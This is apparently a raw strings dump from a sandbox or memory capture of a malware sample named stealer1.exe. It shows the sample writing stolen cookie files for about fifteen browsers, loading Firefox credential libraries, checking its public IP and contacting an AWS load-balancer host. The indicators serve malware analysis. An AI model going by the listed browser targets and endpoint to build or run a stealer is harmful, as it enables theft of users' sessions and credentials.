0x3da158 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
0x3da380 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
0x3da5a8 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
0x3da7d0 (39): C:\Users\A\AppData\Local\Temp\Amigo.txt
0x3da9f8 (47): C:\Users\A\AppData\Local\Temp\Amigo_Cookies.txt
0x3dac20 (48): C:\Users\A\AppData\Local\Temp\GOOGLE_Cookies.txt
0x3dae48 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
0x3db070 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
0x3db298 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
0x3db4c0 (49): C:\Users\A\AppData\Local\Temp\Vivaldi_Cookies.txt
0x3db6e8 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
0x3db910 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
0x3dbb38 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
0x3dbd60 (48): C:\Users\A\AppData\Local\Temp\Yandex_Cookies.txt
0x3dbf88 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
0x3dc1b0 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
0x3dc550 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
0x3dc778 (48): C:\Users\A\AppData\Local\Temp\Kometa_Cookies.txt
0x3dc9a0 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
0x3dcbc8 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
0x3dcdf0 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
0x3dd018 (49): C:\Users\A\AppData\Local\Temp\Orbitum_Cookies.txt
0x3dd240 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
0x3dd468 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
0x3dd690 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
0x3dd8b8 (48): C:\Users\A\AppData\Local\Temp\Comodo_Cookies.txt
0x3ddae0 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
0x3ddd08 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
0x3ddf30 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
0x3de158 (47): C:\Users\A\AppData\Local\Temp\Torch_Cookies.txt
0x3de380 (47): C:\Users\A\AppData\Local\Temp\Opera_Cookies.txt
0x3de5a8 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
0x3de7d0 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
0x3de9f8 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
0x3dec20 (48): C:\Users\A\AppData\Local\Temp\MailRu_Cookies.txt
0x3dee48 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
0x3df070 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
0x3df298 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
0x3df4c0 (49): C:\Users\A\AppData\Local\Temp\rambler_Cookies.txt
0x3df6e8 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
0x3df910 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
0x3dfb38 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
0x3dfd60 (50): C:\Users\A\AppData\Local\Temp\Chromium_Cookies.txt
0x3dff88 (50): C:\Users\A\AppData\Local\Temp\Maxthon5_Cookies.txt
0x3e01b0 (49): C:\Users\A\AppData\Local\Temp\Sputnik_Cookies.txt
0x3e051e (82): 8C:\Users\A\AppData\Local\Temp\result.txt
0x3e0572 (16): hawk.exe
0x460e80 (30): ALLUSERSPROFILE=C:\ProgramData
0x460e9f (34): APPDATA=C:\Users\A\AppData\Roaming
0x460ec2 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
0x460f08 (44): les(x86)=C:\Program Files (x86)\Common Files
0x460f35 (48): CommonProgramW6432=C:\Program Files\Common Files
0x460f66 (14): COMPUTERNAME=O
0x460f75 (11): ComSpec=C:\
0x460f99 (19): FP_NO_HOST_CHECK=NO
0x460fad (12): HOMEDRIVE=C:
0x460fba (17): HOMEPATH=\Users\A
0x460fcc (37): LOCALAPPDATA=C:\Users\A\AppData\Local
0x460ff2 (15): LOGONSERVER=\\O
0x461002 (6): MpConf
0x461018 (47): aPath=C:\ProgramData\Microsoft\Windows Defender
0x461048 (36): MpConfig_ProductCodeName=AntiSpyware
0x46106d (35): MpConfig_ProductPath=C:\Program Fil
0x461107 (17): vngGUID=8C765C2A-
0x461128 (11): 2E8D7028CEB
0x461134 (22): NUMBER_OF_PROCESSORS=4
0x46114b (13): OS=Windows_NT
0x461159 (71): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Window
0x4611b0 (74): ndows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x4611fb (45): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JS
0x461239 (26): PROCESSOR_ARCHITECTURE=x86
0x461254 (28): PROCESSOR_ARCHITEW6432=AMD64
0x461271 (63): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, Gen
0x46134c (29): ProgramW6432=C:\Program Files
0x46136a (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x4613ab (13): PUBLIC=C:\Use
0x4613c8 (13): NNAME=Console
0x4613d6 (14): SystemDrive=C:
0x4613e5 (21): SystemRoot=C:\Windows
0x4613fb (34): TEMP=C:\Users\A\AppData\Local\Temp
0x46141e (33): TMP=C:\Users\A\AppData\Local\Temp
0x461450 (7): RNAME=A
0x461458 (22): USERPROFILE=C:\Users\A
0x46146f (17): windir=C:\Windows
0x461481 (23): windows_tracing_flags=3
0x461499 (47): windows_tracing_logfile=C:\BVTBin\Tests\install
0x4614d8 (6): le.log
0x461566 (26):
0x4615e4 (24):
0x4615fd (8):
0x461646 (26): abcdefghijklmnopqrstuvwxyz
0x461666 (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
0x4617c0 (30): ALLUSERSPROFILE=C:\ProgramData
0x4617df (34): APPDATA=C:\Users\A\AppData\Roaming
0x461802 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
0x461839 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
0x461875 (48): CommonProgramW6432=C:\Program Files\Common Files
0x4618a6 (14): COMPUTERNAME=O
0x4618b5 (35): ComSpec=C:\Windows\system32\cmd.exe
0x4618d9 (19): FP_NO_HOST_CHECK=NO
0x4618ed (12): HOMEDRIVE=C:
0x4618fa (17): HOMEPATH=\Users\A
0x46190c (37): LOCALAPPDATA=C:\Users\A\AppData\Local
0x461932 (15): LOGONSERVER=\\O
0x461942 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
0x461988 (36): MpConfig_ProductCodeName=AntiSpyware
0x4619ad (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
0x4619e4 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
0x461a38 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
0x461a74 (22): NUMBER_OF_PROCESSORS=4
0x461a8b (13): OS=Windows_NT
0x461a99 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x461b3b (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
0x461b79 (26): PROCESSOR_ARCHITECTURE=x86
0x461b94 (28): PROCESSOR_ARCHITEW6432=AMD64
0x461bb1 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
0x461bfa (17): PROCESSOR_LEVEL=6
0x461c0c (23): PROCESSOR_REVISION=9e09
0x461c24 (26): ProgramData=C:\ProgramData
0x461c3f (35): ProgramFiles=C:\Program Files (x86)
0x461c63 (40): ProgramFiles(x86)=C:\Program Files (x86)
0x461c8c (29): ProgramW6432=C:\Program Files
0x461caa (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x461ceb (22): PUBLIC=C:\Users\Public
0x461d02 (19): SESSIONNAME=Console
0x461d16 (14): SystemDrive=C:
0x461d25 (21): SystemRoot=C:\Windows
0x461d3b (34): TEMP=C:\Users\A\AppData\Local\Temp
0x461d5e (33): TMP=C:\Users\A\AppData\Local\Temp
0x461d80 (12): USERDOMAIN=O
0x461d8d (10): USERNAME=A
0x461d98 (22): USERPROFILE=C:\Users\A
0x461daf (17): windir=C:\Windows
0x461dc1 (23): windows_tracing_flags=3
0x461dd9 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x461eb1 (15): )%w )%w@)%w`)%w
0x461ed1 (15): *%w *%w@*%w`*%w
0x461ef1 (15): +%w +%w@+%w`+%w
0x8b09f8 (30): ALLUSERSPROFILE=C:\ProgramData
0x8b0a17 (34): APPDATA=C:\Users\A\AppData\Roaming
0x8b0a3a (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
0x8b0a71 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
0x8b0aad (48): CommonProgramW6432=C:\Program Files\Common Files
0x8b0ade (14): COMPUTERNAME=O
0x8b0aed (35): ComSpec=C:\Windows\system32\cmd.exe
0x8b0b11 (19): FP_NO_HOST_CHECK=NO
0x8b0b25 (12): HOMEDRIVE=C:
0x8b0b32 (17): HOMEPATH=\Users\A
0x8b0b44 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
0x8b0b6a (15): LOGONSERVER=\\O
0x8b0b7a (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
0x8b0bc0 (36): MpConfig_ProductCodeName=AntiSpyware
0x8b0be5 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
0x8b0c1c (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
0x8b0c70 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
0x8b0cac (22): NUMBER_OF_PROCESSORS=4
0x8b0cc3 (13): OS=Windows_NT
0x8b0cd1 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x8b0d73 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
0x8b0db1 (26): PROCESSOR_ARCHITECTURE=x86
0x8b0dcc (28): PROCESSOR_ARCHITEW6432=AMD64
0x8b0de9 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
0x8b0e32 (17): PROCESSOR_LEVEL=6
0x8b0e44 (23): PROCESSOR_REVISION=9e09
0x8b0e5c (26): ProgramData=C:\ProgramData
0x8b0e77 (35): ProgramFiles=C:\Program Files (x86)
0x8b0e9b (40): ProgramFiles(x86)=C:\Program Files (x86)
0x8b0ec4 (29): ProgramW6432=C:\Program Files
0x8b0ee2 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x8b0f23 (22): PUBLIC=C:\Users\Public
0x8b0f3a (19): SESSIONNAME=Console
0x8b0f4e (14): SystemDrive=C:
0x8b0f5d (21): SystemRoot=C:\Windows
0x8b0f73 (34): TEMP=C:\Users\A\AppData\Local\Temp
0x8b0f96 (33): TMP=C:\Users\A\AppData\Local\Temp
0x8b0fb8 (12): USERDOMAIN=O
0x8b0fc5 (10): USERNAME=A
0x8b0fd0 (22): USERPROFILE=C:\Users\A
0x8b0fe7 (17): windir=C:\Windows
0x8b0ff9 (23): windows_tracing_flags=3
0x8b1011 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x8b1566 (26):
0x8b15e4 (24):
0x8b15fd (8):
0x8b1646 (26): abcdefghijklmnopqrstuvwxyz
0x8b1666 (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
0x8b1718 (31): C:\Users\A\Desktop\stealer1.exe
0x8b1850 (30): ALLUSERSPROFILE=C:\ProgramData
0x8b186f (34): APPDATA=C:\Users\A\AppData\Roaming
0x8b1892 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
0x8b18c9 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
0x8b1905 (48): CommonProgramW6432=C:\Program Files\Common Files
0x8b1936 (14): COMPUTERNAME=O
0x8b1945 (35): ComSpec=C:\Windows\system32\cmd.exe
0x8b1969 (19): FP_NO_HOST_CHECK=NO
0x8b197d (12): HOMEDRIVE=C:
0x8b198a (17): HOMEPATH=\Users\A
0x8b199c (37): LOCALAPPDATA=C:\Users\A\AppData\Local
0x8b19c2 (15): LOGONSERVER=\\O
0x8b19d2 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
0x8b1a18 (36): MpConfig_ProductCodeName=AntiSpyware
0x8b1a3d (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
0x8b1a74 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
0x8b1ac8 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
0x8b1b04 (22): NUMBER_OF_PROCESSORS=4
0x8b1b1b (13): OS=Windows_NT
0x8b1b29 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
0x8b1bcb (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
0x8b1c09 (26): PROCESSOR_ARCHITECTURE=x86
0x8b1c24 (28): PROCESSOR_ARCHITEW6432=AMD64
0x8b1c41 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
0x8b1c8a (17): PROCESSOR_LEVEL=6
0x8b1c9c (23): PROCESSOR_REVISION=9e09
0x8b1cb4 (26): ProgramData=C:\ProgramData
0x8b1ccf (35): ProgramFiles=C:\Program Files (x86)
0x8b1cf3 (40): ProgramFiles(x86)=C:\Program Files (x86)
0x8b1d1c (29): ProgramW6432=C:\Program Files
0x8b1d3a (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
0x8b1d7b (22): PUBLIC=C:\Users\Public
0x8b1d92 (19): SESSIONNAME=Console
0x8b1da6 (14): SystemDrive=C:
0x8b1db5 (21): SystemRoot=C:\Windows
0x8b1dcb (34): TEMP=C:\Users\A\AppData\Local\Temp
0x8b1dee (33): TMP=C:\Users\A\AppData\Local\Temp
0x8b1e10 (12): USERDOMAIN=O
0x8b1e1d (10): USERNAME=A
0x8b1e28 (22): USERPROFILE=C:\Users\A
0x8b1e3f (17): windir=C:\Windows
0x8b1e51 (23): windows_tracing_flags=3
0x8b1e69 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
0x8b1eb9 (15): e,t0e,tPe,tpe,t
0x8b1ed9 (15): f,t0f,tPf,tpf,t
0x8b1ef9 (15): g,t0g,tPg,tpg,t
0x9008c0 (64): C:\Windows\System32\fwpuclnt.dll
0x900998 (84): @%SystemRoot%\System32\wshtcpip.dll,-60100
0x900b9c (66): %SystemRoot%\system32\mswsock.dll
0x900e38 (84): @%SystemRoot%\System32\wshtcpip.dll,-60101
0x90103c (66): %SystemRoot%\system32\mswsock.dll
0x9012d8 (84): @%SystemRoot%\System32\wshtcpip.dll,-60102
0x9014dc (66): %SystemRoot%\system32\mswsock.dll
0x901778 (80): @%SystemRoot%\System32\wship6.dll,-60100
0x90197c (66): %SystemRoot%\system32\mswsock.dll
0x901c18 (80): @%SystemRoot%\System32\wship6.dll,-60101
0x901e1c (66): %SystemRoot%\system32\mswsock.dll
0x9020b8 (80): @%SystemRoot%\System32\wship6.dll,-60102
0x9022bc (66): %SystemRoot%\system32\mswsock.dll
0x902558 (76): @%SystemRoot%\System32\wshqos.dll,-100
0x90275c (66): %SystemRoot%\system32\mswsock.dll
0x9029f8 (76): @%SystemRoot%\System32\wshqos.dll,-101
0x902bfc (66): %SystemRoot%\system32\mswsock.dll
0x902e98 (76): @%SystemRoot%\System32\wshqos.dll,-102
0x90309c (66): %SystemRoot%\system32\mswsock.dll
0x903338 (76): @%SystemRoot%\System32\wshqos.dll,-103
0x90353c (66): %SystemRoot%\system32\mswsock.dll
0x903788 (64): %SystemRoot%\system32\NLAapi.dll
0x9038c8 (76): @%SystemRoot%\System32\wshqos.dll,-103
0x9039a0 (78): @%SystemRoot%\system32\nlasvc.dll,-1000
0x903a30 (66): %SystemRoot%\system32\napinsp.dll
0x903c48 (80): @%SystemRoot%\system32\napinsp.dll,-1000
0x903ce0 (66): %SystemRoot%\system32\pnrpnsp.dll
0x903ef8 (80): @%SystemRoot%\system32\pnrpnsp.dll,-1000
0x903fa0 (66): %SystemRoot%\system32\pnrpnsp.dll
0x9041b8 (80): @%SystemRoot%\system32\pnrpnsp.dll,-1001
0x904260 (66): %SystemRoot%\System32\mswsock.dll
0x904478 (84): @%SystemRoot%\system32\wshtcpip.dll,-60103
0x904520 (64): %SystemRoot%\System32\winrnr.dll
0x904a98 (40): MSAFD Tcpip [TCP/IP]
0x904b60 (94): elb097307-934924932.us-east-1.elb.amazonaws.com
0x904bc8 (26): api.ipify.org
0x904ca0 (40): MSAFD Tcpip [UDP/IP]
0x904ea8 (40): MSAFD Tcpip [RAW/IP]
0x9050b0 (44): MSAFD Tcpip [TCP/IPv6]
0x9052b8 (44): MSAFD Tcpip [UDP/IPv6]
0x9054c0 (44): MSAFD Tcpip [RAW/IPv6]
0x9056c8 (54): RSVP TCPv6 Service Provider
0x9058d0 (50): RSVP TCP Service Provider
0x905ad8 (54): RSVP UDPv6 Service Provider
0x905ce0 (50): RSVP UDP Service Provider
0x9d3498 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
0x9d34ec (18): stealer1.exe[2956]
0x9d3500 (15): CurrentThreadID
0x9d3515 (11):
NotifyType
0x9d3524 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
0x9d3555 (14):
RemoteAddress
0x9d3567 (12): SocketHandle
0x9d357a (12): LocalAddress
0x9d358a (14): DLLNotifyEvent
0x9d359b (14):
ConnectHandle
0x9d35b0 (15): Socket_IsSecure
0x9d35c2 (15): Socket_DataSize
0x9d35d8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
0x9d3606 (15): RequestComplete
0x9d361c (15): ReceiveLastByte
0x9d3631 (14):
SendFirstByte
0x9d3646 (14): DNSLookUpStart
0x9d365b (16): ReceiveFirstByte
0x9d3672 (12): SendLastByte
0x9d3684 (10): 	StartTick
0x9d3695 (12): ConnectStart
0x9d36a9 (12): qh.MemStream
0x9d36b6 (6): Z*s5C[
0x9d3759 (6): ^jszM"
0x9d37d2 (7): XDDfs:O
0x9d3a0b (6): 7b0G2N
0x9da6c8 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
0x9da71c (18): stealer1.exe[2956]
0x9da730 (15): CurrentThreadID
0x9da745 (11):
NotifyType
0x9da754 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
0x9da785 (14):
RemoteAddress
0x9da7aa (12): LocalAddress
0x9da7ba (14): DLLNotifyEvent
0x9da7cb (14):
ConnectHandle
0x9da7e0 (15): Socket_IsSecure
0x9da7f2 (15): Socket_DataSize
0x9da808 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
0x9da836 (15): RequestComplete
0x9da84c (15): ReceiveLastByte
0x9da861 (14):
SendFirstByte
0x9da876 (14): DNSLookUpStart
0x9da88b (16): ReceiveFirstByte
0x9da8a2 (12): SendLastByte
0x9da8b4 (10): 	StartTick
0x9da8c5 (12): ConnectStart
0x9da8d9 (12): qh.MemStream
0x9db2a8 (7): imeTick
0x9db2ba (11): RequestGUID
0x9db2c6 (39): &{C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
0x9db2ef (11): ProcessName
0x9db2fc (18): stealer1.exe[2956]
0x9db310 (15): CurrentThreadID
0x9db325 (11):
NotifyType
0x9db334 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
0x9db365 (14):
RemoteAddress
0x9db377 (12): SocketHandle
0x9db38a (12): LocalAddress
0x9db39a (14): DLLNotifyEvent
0x9db3ab (14):
ConnectHandle
0x9db3c0 (15): Socket_IsSecure
0x9db3d2 (15): Socket_DataSize
0x9db3e8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
0x9db416 (15): RequestComplete
0x9db42c (15): ReceiveLastByte
0x9db441 (14):
SendFirstByte
0x9db456 (14): DNSLookUpStart
0x9db46b (16): ReceiveFirstByte
0x9db482 (12): SendLastByte
0x9db494 (10): 	StartTick
0x9db4a5 (12): ConnectStart
0x9db4b9 (12): qh.MemStream
0x9db97d (7): 8705OD&
0x9dbc92 (9): J/rua]lE!
0x9dbdcd (6): sdPtDn
0x9dc250 (6): Mm*,kZ
0x9dc3de (6): 	"%[QQ
0x9dc440 (6): @q/ir?
0x9dc6e3 (6): jXrN
W
0x9dc834 (7): Zu>=fuU
0x9dc87d (7): 7KI%hHL
0x9dc936 (7): P4/q
=
0x9dd08c (7): ]}^O\r5
0x9dd099 (6): h$d_M]
0x9dd176 (6): indFYS
0x9dd373 (6): Tv>@Md
0x9dd486 (7): S#$cb6?
0x9dd5e9 (6): cBt#A4
0x9dd7c6 (6): wuu|Q7
0x9dd875 (8): E=K}jgwc
0x9ddb18 (6): -<gQBy
0x9ddb87 (9): 	!&NWiq$&
0x9ddeba (6): M<J,a|
0x9de096 (9): WN!ybu	$h
0x9de0d9 (6): Y#F2:k
0x9de20a (8): _iC)Yk<>
0x9de78b (6): 93
1%1
0x9de8a7 (6): ,/,DWO
0x9ded6b (7): ^?b5rCq
0x9df1b2 (6): #:]KT;
0x9df2df (7): uOhm'ah
0x9df36e (7): x4#fFql
0x9df42b (6): w4lR[~
0x9e25f8 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $76d24296
0x9e4cf8 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $7574129d
0x9e9928 (100): NamedBuffer, mAH, Process $00000b8c, API $76d24296
0x9ec028 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $76d24406
0x9f0158 (100): NamedBuffer, mAH, Process $00000b8c, API $76d26f01
0x9f79b0 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
0xa05ae8 (100): NamedBuffer, mix, Process $00000b8c, API $76d26f01
0xa1b6d8 (38): \RPC Control\mchIpcHttpAnalyzer_StdV71
0xa1b738 (37): \RPC Control\mchIpcHttpAnalyzer_StdV7
0xa1b75e (38): HttpAnalyzer_StdV71
0xa227ac (7): -VkTJ)<
0xa2283f (7): INlV9QC
0xa22af9 (7): 9#(|F^9
0xa22ba4 (7): gkI_K5F
0xa22d30 (7): PZ(h9}

0xa22edc (6): IZN|;n
0xa2312d (8): 2R/D\RV4
0xa2327c (6): Doc6NZ
0xa2391d (6): cICTSO
0xa23c13 (7): 	_].w<:
0xa23caa (6): {ZC -Y
0xa23e1c (6): {\^
	R
0xa23fcb (7): HA7??oM
0xa2417e (7): jstY4#:
0xa242b2 (6): s"d5#Z
0xa24752 (7): +XMQr$)
0xa2481b (8): {vS]\7h,
0xa24948 (8): V^Rihet^
0xa24b59 (6): @tC_V$
0xa24f23 (12): freebl3.dll

0xa24f80 (12): mozglue.dll

0xa24fdd (9): nss3.dll

0xa25037 (13): softokn3.dll

0xa25095 (12): nssdbm3.dll

0xa2524e (9): WN!ybu	$h
0xa25291 (6): Y#F2:k
0xa252b8 (7): imeTick
0xa252ca (11): RequestGUID
0xa252d6 (39): &{C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
0xa252ff (11): ProcessName
0xa2530c (18): stealer1.exe[2956]
0xa25320 (15): CurrentThreadID
0xa25335 (11):
NotifyType
0xa25344 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
0xa25375 (14):
RemoteAddress
0xa25387 (12): SocketHandle
0xa2539a (12): LocalAddress
0xa253aa (14): DLLNotifyEvent
0xa253bb (14):
ConnectHandle
0xa253d0 (15): Socket_IsSecure
0xa253e2 (15): Socket_DataSize
0xa253f8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
0xa25426 (15): RequestComplete
0xa2543c (15): ReceiveLastByte
0xa25451 (14):
SendFirstByte
0xa25466 (14): DNSLookUpStart
0xa2547b (16): ReceiveFirstByte
0xa25492 (12): SendLastByte
0xa254a4 (10): 	StartTick
0xa254b5 (12): ConnectStart
0xa254c9 (12): qh.MemStream
0xa25604 (7): -VkTJ)<
0xa25697 (7): INlV9QC
0xa25951 (7): 9#(|F^9
0xa259fc (7): gkI_K5F
0xa25b88 (7): PZ(h9}

0xa25d34 (6): IZN|;n
0xa25f85 (8): 2R/D\RV4
0xa260d4 (6): Doc6NZ
0xa26775 (6): cICTSO
0xa26a6b (7): 	_].w<:
0xa26b02 (6): {ZC -Y
0xa26c74 (6): {\^
	R
0xa26e23 (7): HA7??oM
0xa26fd6 (7): jstY4#:
0xa2710a (6): s"d5#Z
0xa275aa (7): +XMQr$)
0xa27673 (8): {vS]\7h,
0xa277a0 (8): V^Rihet^
0xa279b1 (6): @tC_V$
0xa27d7b (12): freebl3.dll

0xa27dd8 (12): mozglue.dll

0xa27e35 (9): nss3.dll

0xa27e8f (13): softokn3.dll

0xa27eed (12): nssdbm3.dll

0xa27f34 (30): pAnalyzer_StdV7
0xa29b1d (6): Qkkbal
0xa46818 (50): NamedBuffer, mAH, Process $00000b8c, API $76d26b0e
0xa46898 (50): NamedBuffer, mAH, Process $00000b8c, API $76d26b0e
0xa468d8 (50): NamedBuffer, mAH, Process $00000b8c, API $7574129d
0xa46918 (50): NamedBuffer, mAH, Process $00000b8c, API $71ac0000
0xa4da58 (55): Software\IEInspectorSoft\HTTPAnalyzerStd\7.x\Properties
0xa5c028 (9): Disk full
0xa5c070 (7): January
0xa5c088 (8): February
0xa5c100 (6): August
0xa5c118 (9): September
0xa5c130 (7): October
0xa5c148 (8): November
0xa5c160 (8): December
0xa5c178 (6): Sunday
0xa5c190 (6): Monday
0xa5c1a8 (7): Tuesday
0xa5c1c0 (9): Wednesday
0xa5c1d8 (8): Thursday
0xa5c1f0 (6): Friday
0xa5c208 (8): Saturday
0xa5c220 (8): M/d/yyyy
0xa5c238 (9): h:mm AMPM
0xa5c550 (9): Exception
0xa5c568 (6): EAbort
0xa5c580 (11): EInOutError
0xa5c598 (9): EIntError
0xa5c5b0 (10): EDivByZero
0xa5c5c8 (11): ERangeError
0xa5c5e0 (10): EMathError
0xa5c5f8 (10): EInvalidOp
0xa5c610 (11): EZeroDivide
0xa5c628 (9): EOverflow
0xa5c640 (10): EUnderflow
0xa5c658 (10): EPrivilege
0xa5c670 (9): EControlC
0xa5c688 (11): EFOpenError
0xa5c6a0 (11): EFilerError
0xa5c6b8 (10): EReadError
0xa5c6d0 (11): EWriteError
0xa5c6e8 (10): EListError
0xa5c700 (10): EBitsError
0xa5c718 (7): EThread
0xa5c730 (9): EParseCSV
0xa5c7f0 (11): qh.IntfList
0xa5c820 (10): qh.HashMap
0xa5c880 (7): qh.List
0xa5c8f8 (10): qh.HashSet
0xa5ca30 (10): ws2_32.dll
0xa5ca78 (7): WSARecv
0xa5ca90 (11): wsock32.dll
0xa5caa8 (11): wsock32.dll
0xa5cac0 (11): secur32.dll
0xa5cb08 (11): wsock32.dll
0xa5cb20 (7): WSASend
0xa5cb38 (11): wsock32.dll
0xa5cb50 (10): ws2_32.dll
0xa5cb68 (10): ws2_32.dll
0xa5cb80 (10): ws2_32.dll
0xa5cb98 (9): SSL_write
0xa5cbb0 (7): WSARecv
0xa5cbc8 (10): ws2_32.dll
0xa5cbe0 (7): connect
0xa5cbf8 (7): WSASend
0xa5cc10 (11): secur32.dll
0xa5cc28 (10): ws2_32.dll
0xa5cc40 (10): ws2_32.dll
0xa5cc58 (10): ws2_32.dll
0xa5cc70 (11): getaddrinfo
0xa5cc88 (10): WSAConnect
0xa5cca0 (11): wininet.dll
0xa5ccb8 (8): SSL_read
0xa5cce8 (8): 2956.576
0xa5cd00 (10): NotifyType
0xa5cd30 (11): ProcessName
0xa5cd60 (8): TimeTick
0xa5cd78 (11): RequestGUID
0xa5cd90 (9): StartTick
0xa63358 (41): Variant or safe array index out of bounds
0xa63390 (36): Error creating variant or safe array
0xa64200 (39): wINetIPCMsgs.TwiWebPageNotifyParamsIMPL
0xa64270 (39): wStdNotifyParams_dll.TwiTimingInfosImpl
0xa642e0 (43): wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
0xa644a0 (38): {C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
0xa64628 (43): wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
0xa64820 (39): wStdNotifyParams_dll.TwiTimingInfosImpl
0xa6a688 (16): Assertion failed
0xa6a6a8 (16): Invalid argument
0xa6a6c8 (14): Stack overflow
0xa6a6e8 (13): Control-C hit
0xa6a708 (16): Access violation
0xa6a728 (16): Integer overflow
0xa6a748 (17): Range check error
0xa6a768 (16): Division by zero
0xa6a788 (18): File access denied
